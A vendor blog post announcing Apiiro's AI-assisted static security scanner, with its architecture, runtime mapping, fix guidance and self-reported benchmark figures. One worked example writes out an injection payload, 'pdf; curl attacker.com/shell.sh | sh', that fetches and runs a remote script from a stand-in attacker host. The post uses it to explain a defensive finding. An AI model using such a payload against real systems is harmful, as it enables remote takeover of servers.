Apiiro Blog ﹥ Introducing Apiiro AI-SAST: Static Scanning Reimagined…
Company News, Research, Technical

Introducing Apiiro AI-SAST: Static Scanning Reimagined – From Code to Runtime

Matan Giladi
Security Researcher
Neta Coral
Principal Product Manager
Published December 18 2025 · 12 min. read

Static Application Security Testing (SAST) is a legacy technology, invented decades ago and largely unchanged since. With the rapid adoption of AI coding assistants and agentic coding tools, development velocity and the application attack surface have increased exponentially, pushing traditional SAST beyond its breaking point. What was once an application security engineer and developer problem has now escalated to CISOs, CTOs, and CIOs – because it directly impacts business growth by slowing and blocking software delivery.

For years, the industry has relied on SAST scanners that excel at pattern matching but lack a deep understanding of each repository’s software architecture graph from code to runtime. The result is a constant flood of alerts that overwhelms security teams, slows development, and erodes trust in the findings. At today’s development velocity, this noise doesn’t just create friction – it actively blocks the business.

But the challenge goes beyond noise; it’s also about blind spots. Traditional SAST scanners can only detect what they have signatures for. They often miss subtle, complex business-logic flaws that are unique to your software’s architecture and data flows – the very vulnerabilities attackers actually exploit.

Today, we’re excited to introduce Apiiro AI-SAST – a new capability within the Apiiro platform that reimagines static analysis for modern, AI-driven software development. Apiiro AI-SAST goes beyond scanning to validate, and fix code risks with the precision of an expert application security engineer, grounded in deep software architectural context from code to runtime.

The Landscape

The “noise” problem in SAST isn’t new, but the stakes have changed. We are seeing a massive influx of AI-generated code, increasing code velocity by 4x and risks by 10x

Traditional SAST tools, which rely on rigid pattern matching, simply cannot keep up. They flag everything that looks like a vulnerability, regardless of whether it’s actually reachable, exploitable, or impacts the risk to the business.

We’ve seen other approaches to trying to solve this with naive “AI assistants” acting as “LLM wrappers” – offering chat-based help, sending the code as is to an external LLM and providing its output as a simple auto-triage. 

While impressive in demos or open source scale – these approaches often fail in enterprise scale reality. Mainly because they lack the deep structural understanding of the code itself. They might tell you what a vulnerability is, but they struggle to definitively tell you if it matters in your specific software architecture graph – from code to runtime environment. At Apiiro, we realized that to truly solve this, we needed a “defense-in-depth” strategy — one that combines the scalability of scanners with the reasoning of an expert.

Our Approach: Giving the AI a Map

Our approach fundamentally shifts SAST from a detection problem to a risk validation and fix problem. We didn’t just bolt an LLM on raw source code, we rebuilt the SAST engine to mimic the cognitive process of an expert application security researcher, using all the tools that such a researcher would utilize:

  • Data: the software graph represents the architecture, across multiple code modules and repositories, call flow, data flow and reachability analysis.
  • Knowledge: Deep know-how and professional best practices for detecting, triaging, and fixing code vulnerabilities – expertise accumulated through the analysis of thousands of real-world scenarios in Fortune 500 enterprises.
  • Context: Deeply understanding the application attack surface, from inventory all code resources like APIs, Data Models, OSS dependencies, Internal packages, AI models, secrets and many more and linking runtime exposure, business criticality, and active security controls to distinguish between a theoretical flaw and a true business risk.

Here is how it works:

1. AST + LLM/Agent Symbiosis: The Best of Both Tools

Traditional AST provides the structure (the syntax tree), while LLMs provide the semantic understanding (the intent). The AI-SAST solution is therefore built in two complementing layers:

  1. Detection and lead generation layer: This is where we leverage the AST tech advantage (speed & determinism) as a “lead generator.” It is fast, deterministic, and can scan millions of lines of code to find every possible structural flaw (the “haystack”). However, it suffers from a lack of semantic understanding, leading to noisy results and false positives.
  2. Triage and fix layer: This is where the LLM and agentic loop advantage (reasoning & data analysis) comes into play. Large Language Models excel at semantic reasoning – understanding intent, variable naming, and logic flow just like a human. However, on their own, they are slow, prone to hallucinations, and expensive to run on entire codebases.

The Apiiro ‘Blend’: We use AST technology to rapidly identify potential signals, and then use a specialized AI agent to act as a “virtual researcher” – leveraging out of the box expert knowledge of a world class vuln researcher on top of the rich Apiiro context. The result: you get the coverage of a scanner with the precision of a human application security researcher, amplifying the advantages of both technologies.

AI-SAST Agentic Loop

Each finding pattern detected goes through tailored evaluation at the second layer. Our AI agentic loop constructs a tailored triage workflow based on the specific security issue pattern. It also grounds the LLM model with the most accurate and relevant examples.

2. Deep Code Analysis (DCA): The “Data Fabric” Behind the AI

An LLM/Agent is only as good as the context you feed it. Apiiro removes the guesswork by grounding our AI in Deep Code Analysis (DCA). DCA technology is used to continuously discover and inventory all code resources, across all material changes and build – with enterprise scale and accuracy – a comprehensive Software Graph of your entire codebase before the AI even looks at it. It maps:

  • Applicative structure (control flow + data flow): e.g., understanding that this specific Java class is a Controller and that variable is a verified user ID.
  • Extended application inventory: Discover and inventory  every API, OSS dependency, internal packages, AI models, data models and fields and their relations
  • Technology stack: mapping the tech stack used by the code across 750+ categories, e.g., Security controls (Authz, Authn, Encryption), Data storage and access (Data stores, data access patterns), Development tools (languages, utils, test frameworks), Applicative components (Web, UI, MQ, logging, MCP server) and many more

Why this matters: When Apiiro AI-SAST assesses a potential vulnerability and later decides how to fix it, it isn’t looking only at lines of code or specific files , it’s looking at a Software Graph. For example, in case of a potential SQL injection, it “knows” things like:

  • Validate if the input is sanitized multiple layers deep in the call stack.
  • Identify non-production code paths, test environments, or development artifacts to filter out noise. 
  • Pinpoint the most effective fix location 
  • Leverage the  common frameworks and coding patterns already used by the organization to sanitize the code in other cases.

By grounding the AI in the reality of the software architecture graph and tech stack, Apiiro eliminates inconsistencies, inaccuracies, and generic answers – and delivers risks and fixes that are actual and practical in the reality of your specific environment.

3. Code-to-Runtime (C2R): True Risk Reality

Real risk isn’t about finding “bad code”, but knowing if it actually has any impact. Apiiro is leveraging code-to-runtime ‘Applicative Fingerprinting’ based on Deep Code Analysis (DCA) technical to automatically and continuously – without any human labor – map code resources  (e.g., API, OSS dependencies, Code modules) to their specific build and deployment location of the container artifacts or exposing API endpoints.

This allows us to distinguish between a theoretical risk and a real-world crisis, solving the blind spots between code-scanning only and cloud-infrastructure only approaches. 

Consider a scenario where a developer introduces a SQL injection vulnerability in an API explicitly annotated as /internal/stock-check. Other SAST tools would see the “/internal” path and dismiss the finding as low-risk, assuming it’s unreachable from the outside world. Similarly, cloud security tools would overlook it because the container infrastructure itself is securely configured.

However, in modern architectures, sometimes an API Gateway sits in front of these services, rewriting public URLs to internal ones – for example, possibly routing public traffic from api.shop.com/products directly to that “internal” stock check function. 

Apiiro Code-to-Runtime matching connects these dots. By correlating the runtime traffic code definitions, Apiiro recognizes that this “internal” function is actually receiving direct public traffic. It can automatically escalate the vulnerability to Critical, alerting you that a SQL injection is live and exposed to the internet, despite what the code annotations might suggest.

4. AI Fix: Beyond “Generic” Fix Suggestions

Detecting a vulnerability is only half the battle; fixing it without breaking the application is the real challenge. Because standard SAST tools lack context, they often suggest local “band-aid” fixes on the specific line of code where the error appears. This leads to code bloat and repetitive work.

Apiiro leverages our Software Graph to guide remediation at the source: 

  • Root cause analysis: Traces vulnerabilities back through the Software Graph to identify the most primary source of the vulnerability, avoiding noisy, shallow and incomplete fixes.
  • Smart location: Instead of patching ten different API endpoints, Apiiro can identify the single shared middleware or validation filter where a fix will secure the entire application.
  • Contextual fixes: Generating precise code modifications using your existing frameworks and code patterns, reducing the time developers spend researching the correct implementation and fixing with minimal intervention.

While we currently deliver these architectural insights directly to developers to guide their work (as part of Apiiro’s Autofix Agent), we are actively developing the capability to package these insights into a complete validation fix – completing the loop from detection to deployment.

5. Adaptive Feedback: Evolving Accuracy with Human Context 

Accuracy is a moving target, which is why the AI SAST engine is designed to adapt to our customers specific environment. We put you in control of the “noise filter” at two levels:

  • Foundation tuning: Customers can customize the underlying AST detection rules to ensure the initial scan aligns with the organization’s coding standards.
  • Algorithmic feedback: When a user overrides an AI determination (e.g., marking a finding as “False Positive”), we use that signal to refine our models. This “human-in-the-loop” feedback ensures that Apiiro AI SAST doesn’t just learn generic patterns – it learns your logic.

Examples

“Apiiro’s AI-SAST, powered by Deep Code Analysis (DCA), reduced false positives by over 85% within weeks. By mapping SAST risks to internet-facing API entry points, we can confidently prioritize real exploited risks and help our developers increase development velocity.” – Jason Espone, Global Head of Application Security at C.H. Robinson

By mimicking the investigative process of a human expert, Apiiro AI SAST delivers highly qualified risks, not just alerts. Here are two authentic examples from a same single enterprise company’s repository, anonymized and renamed for clarity:

True Positives (TP): Verified Data-Flow Reachability

The following Critical Remote Code Execution is visible only by applying contextual AI reasoning over the Software Graph. 

The payload and execution are separated by time and location: a forgotten endpoint poisons the system state, planting a payload that a separate periodic job executes later. What appears to be safe internal data flow is actually a dormant exploit.

Details: Notice the command execution at the end of this snippet. When the initiator is a periodic summary job (msum), a parameter called format gets added to it:

Looking at the API endpoint, it does not modify report_format or initiator – they stay safe, internal properties:

However, in a remote part of the code, there’s an endpoint that configures periodic jobs:

The problem: this endpoint lets a user set the value of report_format. Worse – because it’s not part of the UI, the developer forgot access control (notice the missing auth decorator) – so anyone can call it.

While only the automated job can trigger the command execution, sending the following to this endpoint allows attackers to take over the server:

format=”pdf; curl attacker.com/shell.sh | sh”

False Positives (FP): Evidence-Based Dismissal

Dismissing this alert of Critical Remote Code Execution is possible only by solving two distinct analysis problems simultaneously: Class-level Data Flow and Configuration-Aware Control Flow. Again, this is impossible without applying contextual AI reasoning over the Software Graph.

Most tools incorrectly flag this because user input hits a shell command. However, the Software Graph proves that every path is blocked: one by strict validation logic buried in a constructor, and the other by a configuration flag that renders the code unreachable.

Details: A notification service renders alert templates. A scanner flags command execution because self.channel is interpolated directly into a shell command:

The data flow starts at the main API endpoint, where the user controls the channel parameter:

Why it’s safe (Path A – Validation): Tracing the NotificationRenderer class reveals that channel is validated against a strict allowlist in the constructor before assignment. The scanner sees “input in command,” but the Software Graph sees “constrained input”:

Why it’s safe (Path B – Unreachable): A legacy method bypasses this validation, seemingly re-introducing the risk:

However, tracing the control flow back to the call site reveals a gating condition: LEGACY_PARTNER_MODE. By resolving the configuration state, we see this flag defaults to False and is never enabled in the production environment.

Standard tools flag both paths. One because they miss the validation, the other because they can’t resolve the config. Contextual AI reasoning proves both are safe, filtering out noise that would otherwise waste developer time.

Benchmarks

During its development and while working  with large enterprise customers, we are currently benchmarking our AI SAST against a “True Set” – a validated dataset of true and false positives confirmed by human experts-and comparing performance directly against other leading traditional SAST vendors. Here are the principles for this evaluation and some early results:

Validation on Real Enterprise Data (Not Just OSS)

It is easy to test accuracy using curated open-source benchmark apps like WebGoat. In our experience, this often creates misleading results, as their code is highly unrealistic. Real-world enterprise code is fundamentally different – it is massive, messy, laden with legacy debt, and built on custom internal frameworks. An AI model that performs perfectly on a clean, 50-file GitHub repository often crumbles when faced with a 5-million-line monolith.

Our Approach: We benchmark Apiiro AI SAST against a “True Set” derived from real production environments, proving we can effectively find novel vulnerabilities and filter noise in the chaotic, high-scale environments where your developers actually work.

The true set included 322 separate cases of true vulnerabilities mapped by Apiiro researcher across 10s of production  repositories 

Precision  Recall
Apiiro AI-SAST94%90%

For sanity, we also compared our results to the results of a few leading legacy SAST vendors’ results, who came up with precision of only 24%-27%, and recall of less than 50%. The low recall rates can be attributed to a pre-AI approach that fine-tunes rule logic via static analysis and excludes high-noise rules instead of triaging them effectively.  

1 Precision – how many of the results detected by the tool were true
Recall – how many of the real true cases in the true set were detected

Wrapping It All Together: The End-to-End Platform Advantage

An accurate finding is useless if it gets lost in a PDF report or buried in a Jira backlog. This is where the power of the Apiiro platform transforms AI insights into operational reality. Apiiro AI SAST is embedded within the Apiiro Risk Graph so it can drive action through enterprise-grade workflows.

The Risk Graph: Your Contextual Engine

Apiiro’s Risk Graph builds a multi-dimensional map connecting your code, runtime environment, developers, organizational policies and business impact. It enables you to transform ‘this is a real vulnerability’ decided by the AI SAST engine to a decision if and how much it matters to you. It enables defining dynamic policies such as: 

A “High Severity” SQL Injection identified as true-positive is escalated to “Critical Block” if it touches PII data in a repository in-scope for GDPR. Conversely, it might be downgraded if it’s in a sandboxed demo app.

It also empowers you to ask complex questions about your environment, such as, “Show me all internet-facing APIs written in Java that access financial data and have unmitigated AI-verified vulnerabilities.”

Workflows: Automation at Enterprise Scale

Finding the risk is step one. Fixing it at the scale of 10,000 developers is step two. Apiiro’s Workflow engine takes the verified, high-context risks and routes them in the org with surgical precision. 

  • Instead of spamming a general security channel, the platform uses code owners identified by the risk graph (read more about that here: building-bridges-between-security-and-rd-apiiros-continuous-investment-in-finding-the-right-code-owner) to route the fix request directly to the specific developer who wrote and/or owns the code, via the tools they use (Slack, MS Teams, Jira).
  • You can set granular enforcement rules, e.g. for a “Confidence: High” AI-verified finding in a high-risk repo, you can block the PR automatically. For lower-confidence or internal-only issues, you can simply comment on the PR or create a ticket for later review.

Availability 

The Apiiro AI-SAST is available in preview for Apiiro customers. See Apiiro AI-SAST in action.